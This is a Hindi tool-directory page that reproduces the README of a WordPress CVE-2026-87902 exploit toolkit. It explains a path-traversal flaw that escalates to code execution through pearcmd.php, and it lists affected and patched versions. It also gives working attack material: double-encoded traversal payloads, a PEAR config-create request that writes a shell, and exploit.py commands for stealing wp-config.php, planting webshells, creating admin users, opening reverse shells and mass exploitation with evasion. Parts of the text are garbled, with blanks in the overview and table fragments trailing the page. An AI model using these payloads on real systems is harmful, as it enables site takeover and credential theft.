Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-87902-Toolkit — WordPress CVE-2026-87902 LFI-to-RCE टूलकिट, जिसमें एक weaponized exploit chain (PEAR RCE, webshell, admin creation, loot) और एक non-intrusive SafeChecker संस्करण तथा risk auditor शामिल है। | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-87902-toolkit
रक्षात्मक उपकरणभेद्यता स्कैनरपेलोड जनरेशनशोषणरिवर्स इंजीनियरिंगवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
1222घं 2मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHub
tc4dy/cve-2026-87902-toolkit

CVE-2026-87902-Toolkit

WordPress CVE-2026-87902 LFI-to-RCE टूलकिट, जिसमें एक weaponized exploit chain (PEAR RCE, webshell, admin creation, loot) और एक non-intrusive SafeChecker संस्करण तथा risk auditor शामिल है।

रिपॉजिटरी देखें
साझा करें

CVEPoC

CVE‑2026‑87902 – WordPress अनधिकृत LFI→RCE टूलकिट

Python 3.8+ CVSS Author WordPress

केवल नैतिक उपयोग हेतु – अधिकृत सुरक्षा परीक्षण
यह रिपॉज़िटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनेट्रेशन टेस्टरों के लिए उपकरण प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच CFAA (US), Computer Misuse Act (UK), TCK 243/244 (Turkey), और दुनिया भर के समान कानूनों के तहत अवैध है।


📖 भेद्यता अवलोकन

CVE‑2026‑87902 WordPress Core (संस्करण 4.7.0 से तक) में एक गंभीर अनधिकृत पथ ट्रैवर्सल और लोकल फ़ाइल इन्क्लूज़न (LFI) भेद्यता है, जो एक अनधिकृत हमलावर को क्वेरी पैरामीटर के माध्यम से मनमानी स्थानीय फ़ाइलों को शामिल करने की अनुमति देती है, और विशिष्ट सर्वर स्थितियों में PEAR फ़ाइल को चेन करके तक बढ़ा सकती है। CVSS स्कोर: । जुलाई 2026 में WordPress के HackerOne कार्यक्रम के माध्यम से द्वारा प्रकट किया गया। 22 सितंबर, 2026 को में पैच किया गया, जिसमें 4.7 तक बैकपोर्ट शामिल हैं।

7.1.1
pagename
.php
pearcmd.php
रिमोट कोड एक्ज़ीक्यूशन (RCE)
9.2 (गंभीर)
Robert Ressl
7.1.2

यह दोष 2016 से प्रत्येक WordPress रिलीज़ को प्रभावित करता है — एक दशक के संस्करण जो बिना पता चले कोड समीक्षा से गुज़रे। मूल कारण CMS में सबसे अधिक उपयोग किए जाने वाले कोड पथों में से एक में एकल अनुपस्थित सत्यापन कॉल है।

यह कैसे काम करता है

  1. असैनिटाइज़्ड टेम्पलेट रिज़ॉल्यूशन – wp-includes/template.php में get_page_template() pagename क्वेरी वेरिएबल से टेम्पलेट उम्मीदवार बनाता है। उसी फ़ंक्शन में एक पड़ोसी कोड पथ ../ अनुक्रमों को अवरुद्ध करने के लिए validate_file() लागू करता है, लेकिन $pagename शाखा इसे कॉल नहीं करती। pagename में कोई भी ट्रैवर्सल बिना जाँच के पास हो जाता है।

  2. डबल-एन्कोडेड ट्रैवर्सल बायपास – WordPress pagename पर sanitize_title_for_query() लागू करता है, जो ट्रैवर्सल को रोकने के लिए शाब्दिक बिंदुओं (.) को हाइफ़न से बदल देता है। लेकिन यह फ़ंक्शन पहले से डिकोड किए गए इनपुट पर काम करता है और पुनरावर्ती रूप से डिकोड नहीं करता। एक हमलावर %252e%252e%252f भेजता है; वेब सर्वर इसे एक बार %2e%2e%2f में डिकोड करता है; सैनिटाइज़र को कोई शाब्दिक बिंदु नहीं दिखता और इसे पास कर देता है; फिर get_page_template() फ़ंक्शन के अंदर urldecode() को फिर से कॉल करता है, जिससे ../ उत्पन्न होता है।

  3. थीम डायरेक्टरी पूर्वशर्त – सक्रिय थीम में एक शीर्ष-स्तरीय डायरेक्टरी होनी चाहिए जिसका नाम page- से शुरू होता है (जैसे page-templates/)। निर्मित फ़ाइलनाम page-{pagename}.php फिर ट्रैवर्सल के माध्यम से थीम रूट से बाहर निकल जाता है। पुरानी डिफ़ॉल्ट थीम (Twenty Twelve, Twenty Fourteen) और लोकप्रिय तृतीय-पक्ष थीम (Neve, Hestia, Sydney) यह डायरेक्टरी शिप करती हैं। ऐसे पैरेंट से विरासत में मिली चाइल्ड थीम भी पूर्वशर्त को पूरा करती हैं।

  4. locate_template() में LFI सिंक – उम्मीदवार पथ locate_template() को पास किया जाता है, जो थीम डायरेक्टरियों में खोजता है। चूँकि ट्रैवर्सल उन डायरेक्टरियों के बाहर एक फ़ाइल को हल करता है, और फ़ंक्शन केवल file_exists() की जाँच करता है, कोई भी पठनीय .php फ़ाइल पूर्ण वेब सर्वर विशेषाधिकारों के साथ शामिल की जाती है। यह LFI को थीम पूर्वशर्त को पूरा करने वाली किसी भी अनपैच्ड साइट पर बिना शर्त बना देता है — जिसमें इसके डेटाबेस क्रेडेंशियल और प्रमाणीकरण साल्ट के साथ wp-config.php भी शामिल है।

  5. PEAR pearcmd.php RCE एस्केलेशन – PEAR कई PHP इंस्टॉलेशनों के साथ आता है। इसका pearcmd.php सामान्यतः केवल CLI होता है, लेकिन जब register_argc_argv=On होता है, तो PHP URL क्वेरी स्ट्रिंग से $_SERVER['argv'] को भरता है। हमलावर LFI के माध्यम से pearcmd.php को शामिल करता है, config-create को एक तर्क के रूप में पास करता है, और PHP कोड प्लस एक आउटपुट पथ (/tmp/shell.php) प्रदान करता है। PEAR हमलावर के कोड को डिस्क पर लिखता है; एक दूसरा इन्क्लूड इसे निष्पादित करता है।

  6. दूसरा शोषण मार्ग – name (फ्रंट-पेज स्लग), page_id (पोस्ट-पेज ID), preview=true, और एक pagename पेलोड को मिलाने वाला अनुरोध WP_Query को उसकी post_name शाखा में मोड़ देता है, जो sanitize_title_for_query() के माध्यम से pagename को कभी रीराइट नहीं करती। यह ट्रैवर्सल में शाब्दिक बिंदुओं की अनुमति देता है। single.php के बिना एक थीम की आवश्यकता होती है।

  7. सर्वर कॉन्फ़िगरेशन आवश्यकताएँ – RCE वास्तविक परिनियोजनों में सामान्य दो स्थितियों पर निर्भर करता है: pearcmd.php मौजूद/पठनीय (साझा होस्टिंग, cPanel, आधिकारिक PHP Docker इमेज पर लगातार), और register_argc_argv=On (PHP 8.5 से नीचे डिफ़ॉल्ट)। PHP 8.5 ने डिफ़ॉल्ट को Off में बदल दिया। PEAR के बिना आधुनिक PHP 8.5+ सर्वर पर, शोषण LFI पर रुक जाता है।

  8. पैच – WordPress 7.1.2 दो सुरक्षा परतें जोड़ता है: (a) pagename शाखा में अनुपस्थित validate_file() कॉल, और (b) एक नया _wp_is_template_path_allowed() फ़ंक्शन जिसे locate_template() द्वारा प्रत्येक हल किए गए टेम्पलेट के लिए कॉल किया जाता है। यह फ़ंक्शन .. वाले पथों को अस्वीकार करता है, फिर realpath() के माध्यम से वास्तविक पथ को हल करता है और सत्यापित करता है कि यह अनुमत थीम डायरेक्टरियों में से एक के अंदर है। यह गहराई-में-रक्षा सिंक को बंद करती है, न कि केवल उस तक के एक मार्ग को।

  9. जंगल में सक्रिय शोषण – पैच रिलीज़ के 5 घंटे बाद पहले दुर्भावनापूर्ण अनुरोध देखे गए (17:44 UTC, 22 सितंबर, 2026)। अगले दिन में ट्रैफ़िक दस गुना बढ़ गया। तीन चरण देखे गए: config-show टोह → कोर-फ़ाइल पहचान → config-create हथियारीकरण। पेलोड फ़ाइलनामों में wp-pear-rce-flag.php, poc87902.php, luci_*.php, zeta_*.php शामिल थे, जो /tmp और /var/tmp में लिखे गए। हमला करने वाले IP: 169.58.48.193, 169.58.48.195, 2001:df1:e8c0::106b।

  10. प्रभाव – वेब सर्वर विशेषाधिकारों के साथ कोड निष्पादन। पूर्ण साइट अधिग्रहण, wp-config.php क्रेडेंशियल चोरी, डेटा निकासी, वेबशेल इंस्टॉलेशन, एडमिन उपयोगकर्ता निर्माण, रिवर्स शेल, संशोधित प्लगइन/थीम के माध्यम से सप्लाई-चेन हमले, और जुड़े सेवाओं में पार्श्व गति। CVSS 9.2 स्कोर नेटवर्क-शोषणीय, बिना-प्रमाणीकरण, उच्च-गोपनीयता/अखंडता/उपलब्धता प्रभाव को दर्शाता है। उच्च हमला जटिलता थीम और सर्वर पूर्वशर्तों को दर्शाती है, लेकिन सामान्य साझा होस्टिंग पर वे स्थितियाँ अक्सर पूरी होती हैं।

प्रभावित संस्करण

  • 4.7.0 – 4.7.37 – भेद्य
  • 4.8.0 – 4.8.32 – भेद्य
  • 4.9.0 – 4.9.33 – भेद्य
  • 5.0.0 – 5.0.29 – भेद्य
  • 5.1.0 – 5.1.26 – भेद्य
  • 5.2.0 – 5.2.28 – भेद्य
  • 5.3.0 – 5.3.25 – भेद्य
  • 5.4.0 – 5.4.23 – भेद्य
  • 5.5.0 – 5.5.22 – भेद्य
  • 5.6.0 – 5.6.21 – भेद्य
  • 5.7.0 – 5.7.19 – भेद्य
  • 5.8.0 – 5.8.17 – भेद्य
  • 5.9.0 – 5.9.18 – भेद्य
  • 6.0.0 – 6.0.16 – भेद्य
  • 6.1.0 – 6.1.14 – भेद्य
  • 6.2.0 – 6.2.13 – भेद्य
  • 6.3.0 – 6.3.12 – भेद्य
  • 6.4.0 – 6.4.12 – भेद्य
  • 6.5.0 – 6.5.12 – भेद्य
  • 6.6.0 – 6.6.9 – भेद्य
  • 6.7.0 – 6.7.9 – भेद्य
  • 6.8.0 – 6.8.10 – भेद्य
  • 6.9.0 – 6.9.9 – भेद्य
  • 7.0.0 – 7.0.6 – भेद्य
  • 7.1.0 – 7.1.1 – भेद्य

पैच

  • 4.7.37, 4.8.32, 4.9.33, 5.0.29, 5.1.26, 5.2.28, 5.3.25, 5.4.23, 5.5.22, 5.6.21, 5.7.19, 5.8.17, 5.9.18, 6.0.16, 6.1.14, 6.2.13, 6.3.12, 6.4.12, 6.5.12, 6.6.9, 6.7.9, 6.8.10, 6.9.9, 7.0.6, या 7.1.2 या नए संस्करण में अपग्रेड करें।
  • यदि अपग्रेड संभव नहीं है, तो सक्रिय थीम में page-* डायरेक्टरी का नाम बदलें या हटा दें, php.ini में register_argc_argv=Off सेट करें, और WAF स्तर पर pagename पैरामीटर में डबल-एन्कोडेड ट्रैवर्सल को अवरुद्ध करें।

[<->] उपकरण

उपकरणउद्देश्यइच्छित उपयोगकर्ता
exploit.pyLFI पहचान, PEAR RCE चेन, एडमिन उपयोगकर्ता निर्माण, वेबशेल इंस्टॉल, रिवर्स शेल, मास स्कैनिंग, स्टेल्थ मोड, प्रॉक्सी रोटेशन, और पूर्ण हमला श्रृंखला के साथ पूर्ण हथियारीकृत टूलकिट।रेड टीमें / अधिकृत पेनेस्टर
safecheck.pyगैर-घुसपैठिया भेद्यता जाँचकर्ता जो WordPress संस्करण का पता लगाता है, एक्सपोज़र को मान्य करता है, और किसी भी फ़ाइल को शामिल किए या कोई पेलोड निष्पादित किए बिना जोखिम का आकलन करता है। JSON रिपोर्ट उत्पन्न करता है।ब्लू टीमें / सुरक्षा ऑडिटर

[</>] विशेषता तुलना

विशेषताexploit.pysafecheck.py
भेद्यता पहचान✅✅
संस्करण पहचान✅✅
थीम page-* डायरेक्टरी जाँच✅✅
PEAR pearcmd.php पहुँच✅✅
register_argc_argv जाँच✅✅
WAF व्यवहार प्रोब❌✅
डबल-एन्कोडेड LFI प्रोब✅❌
PEAR config-create RCE✅❌
एडमिन उपयोगकर्ता निर्माण✅❌
वेबशेल इंस्टॉल✅❌
रिवर्स शेल✅❌
wp-config.php लूट✅❌
पूर्ण हमला श्रृंखला✅❌
मास स्कैनिंग (मल्टी-थ्रेड)✅✅
प्रॉक्सी समर्थन✅✅
प्रॉक्सी रोटेशन✅❌
User‑Agent रोटेशन (OPSEC)✅❌
जिटर (OPSEC)✅❌
रेट लिमिटर✅❌
गैर-घुसपैठिया (सुरक्षित) मोड❌✅
जोखिम आकलन रिपोर्ट✅✅
शमन सिफ़ारिशें❌✅

[+] उपयोग केस सारांश

परिदृश्यअनुशंसित उपकरण
ब्लू टीम – सत्यापित करना कि आपका WordPress भेद्य है या नहींsafecheck.py
सुरक्षा ऑडिट – गैर-घुसपैठिया भेद्यता मूल्यांकनsafecheck.py
रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनेट्रेशन परीक्षणexploit.py
बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षणsafecheck.py
मास स्कैनिंग – भेद्यता के लिए कई लक्ष्यों की जाँचexploit.py (केवल-पहचान)
घटना प्रतिक्रिया – जाँचना कि सिस्टम से समझौता हुआ है या नहींsafecheck.py

[+] इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-87902-Toolkit
cd CVE-2026-87902-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

[/] पैरामीटर

exploit.py पैरामीटर

पैरामीटरविवरण
-u, --urlएकल लक्ष्य WordPress URL (जैसे http://wordpress.example.com)
-f, --fileमास स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
--pipestdin से लक्ष्य पढ़ें
--exploitपहचान के बाद शोषण करें
--create-adminस्थायी एडमिन उपयोगकर्ता बनाएँ (प्रारूप: USER:PASS)
--webshellRCE के माध्यम से वेबशेल इंस्टॉल करें
--reverse-shellरिवर्स शेल ट्रिगर करें (प्रारूप: LHOST:LPORT)
--lootwp-config.php और अन्य फ़ाइलें लूटें
--threadsमल्टी-टार्गेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 8)
--timeoutअनुरोध टाइमआउट (डिफ़ॉल्ट: 15s)
--retryअधिकतम पुनः प्रयास (डिफ़ॉल्ट: 3)
--proxyHTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
--proxy-listरोटेशन के लिए प्रॉक्सी वाली फ़ाइल (प्रति पंक्ति एक)
--proxy-rotateप्रॉक्सी रोटेशन रणनीति (round-robin, random, sticky)
--jitterअनुरोधों के बीच यादृच्छिक जिटर
--jitter-rangeजिटर न्यूनतम,अधिकतम सेकंड (डिफ़ॉल्ट: 0.1,2.0)
--delayअनुरोधों के बीच निश्चित विलंब
--stealthस्टेल्थ मोड सक्षम करें (UA रोटेशन + जिटर)
--insecureTLS सत्यापन अक्षम करें
--user-agentकस्टम User-Agent

safecheck.py पैरामीटर

पैरामीटरविवरण
-u, --urlएकल लक्ष्य WordPress URL (जैसे http://wordpress.example.com)
-f, --fileलक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
--pipestdin से लक्ष्य पढ़ें
-t, --threadsमल्टी-टार्गेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 8)
--timeoutअनुरोध टाइमआउट (डिफ़ॉल्ट: 15s)
--retryअधिकतम पुनः प्रयास (डिफ़ॉल्ट: 3)
--proxyHTTP/HTTPS प्रॉक्सी
--jitterअनुरोधों के बीच यादृच्छिक जिटर
--jitter-rangeजिटर न्यूनतम,अधिकतम सेकंड (डिफ़ॉल्ट: 0.1,2.0)
--delayअनुरोधों के बीच निश्चित विलंब
--insecureTLS सत्यापन अक्षम करें
--user-agentकस्टम User-Agent
--max-bodyअधिकतम प्रतिक्रिया बॉडी आकार
--concurrent-per-hostप्रति होस्ट अधिकतम समवर्ती अनुरोध
--excludeबहिष्कृत करने के लिए अल्पविराम-पृथक होस्ट
-o, --outputJSON रिपोर्ट फ़ाइल में सहेजें (.json, .csv, .html, .jsonl)
--dbSQLite डेटाबेस फ़ाइल
-v, --verboseविस्तृत आउटपुट
-q, --quietशांत मोड
--no-bannerबैनर दबाएँ

[>] परिदृश्य

#परिदृश्यकमांड
1त्वरित भेद्यता जाँचpython safecheck.py -u http://wordpress.example.com
2रिपोर्ट के साथ विस्तृत स्कैनpython safecheck.py -u http://wordpress.example.com -o report.json -v
3फ़ाइल से मास ऑडिटpython safecheck.py -f targets.txt -t 10 -o audit.json
4केवल-पहचान शोषणpython exploit.py -u http://wordpress.example.com
5wp-config.php लूटpython exploit.py -u http://wordpress.example.com --exploit --loot
6वेबशेल के साथ पूर्ण हमलाpython exploit.py -u http://wordpress.example.com --exploit --webshell
7स्थायी एडमिन उपयोगकर्ता बनाएँpython exploit.py -u http://wordpress.example.com --exploit --create-admin evil:P@ssw0rd1
8रिवर्स शेलpython exploit.py -u http://wordpress.example.com --exploit --reverse-shell 10.0.0.1:4444
9पूर्ण हमला श्रृंखलाpython exploit.py -u http://wordpress.example.com --exploit --loot --webshell --create-admin evil:P@ssw0rd1
10स्टेल्थ के साथ मास शोषणpython exploit.py -f targets.txt -t 20 --exploit --stealth --jitter -o results.json
11प्रॉक्सी रोटेशनpython exploit.py -f targets.txt --proxy-list proxies.txt --proxy-rotate random --exploit

🧪 एंडपॉइंट और शोषण श्रृंखला

एक्सप्लॉइट निम्नलिखित WordPress एंडपॉइंट और शोषण चरणों का उपयोग करता है:

चरणविधिएंडपॉइंटविवरण
1. फ़िंगरप्रिंटGET/wp-content, wp-includes, wp-json के माध्यम से WordPress का पता लगाएँ
2. संस्करणGET/feed/<generator> मेटा के माध्यम से संस्करण निकालें
3. पेज IDGET/wp-json/wp/v2/pagesएक वैध page_id खोजें
4. थीम डायरेक्टरीGET/wp-content/themes/{theme}/page-templates/page-* पूर्वशर्त की पुष्टि करें
5. LFI प्रोबGET/?page_id={id}&pagename={payload}स्थानीय फ़ाइल शामिल करने के लिए डबल-एन्कोडेड ट्रैवर्सल
6. PEAR इन्क्लूडGET/?page_id={id}&pagename={pearcmd}pearcmd.php शामिल करें
7. PEAR RCEGET/?+config-create+/&page_id={id}&pagename={pearcmd}&/{payload}+{outfile}PEAR के माध्यम से PHP फ़ाइल लिखें
8. निष्पादनGET/?page_id={id}&pagename={outfile}लिखी गई फ़ाइल शामिल करें → RCE
9. स्थायित्वGET(RCE के माध्यम से)एडमिन उपयोगकर्ता / वेबशेल बनाएँ
10. लूटGET/?page_id={id}&pagename={wp-config}LFI के माध्यम से wp-config.php पढ़ें

पेलोड प्रारूप

root@kitploit:~
# डबल-एन्कोडेड ट्रैवर्सल उदाहरण
pagename = page-templates/..%252f..%252f..%252f..%252fusr/local/lib/php/pearcmd

# PEAR config-create RCE चेन
GET /?+config-create+/&page_id=2&pagename={encoded_pearcmd}&/{encoded_php}+/tmp/shell.php

# PEAR इन्क्लूड ट्रिगर
GET /?page_id=2&pagename={encoded_output_path}

🛡️ जिम्मेदार उपयोग

  • इन उपकरणों का उपयोग केवल उन सिस्टम पर करें जिनका आप स्वामी हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • अनधिकृत पहुँच अवैध और अनैतिक है।
  • लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।
  • हमेशा अपने देश के कानूनों और विनियमों का पालन करें।

यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

टूल डाउनलोड करें
JSON रिपोर्ट✅✅
CSV रिपोर्ट✅✅
HTML रिपोर्ट✅✅
SQLite आउटपुट✅✅
कस्टम User‑Agent✅✅
SSL सत्यापन नियंत्रण✅✅
--max-bodyअधिकतम प्रतिक्रिया बॉडी आकार
--concurrent-per-hostप्रति होस्ट अधिकतम समवर्ती अनुरोध
--rate-limitप्रति सेकंड अधिकतम अनुरोध
--excludeबहिष्कृत करने के लिए अल्पविराम-पृथक होस्ट
-o, --outputरिपोर्ट फ़ाइल में सहेजें (.json, .csv, .html, .jsonl)
--dbSQLite डेटाबेस फ़ाइल
-v, --verboseविस्तृत आउटपुट
-q, --quietशांत मोड
--no-bannerबैनर दबाएँ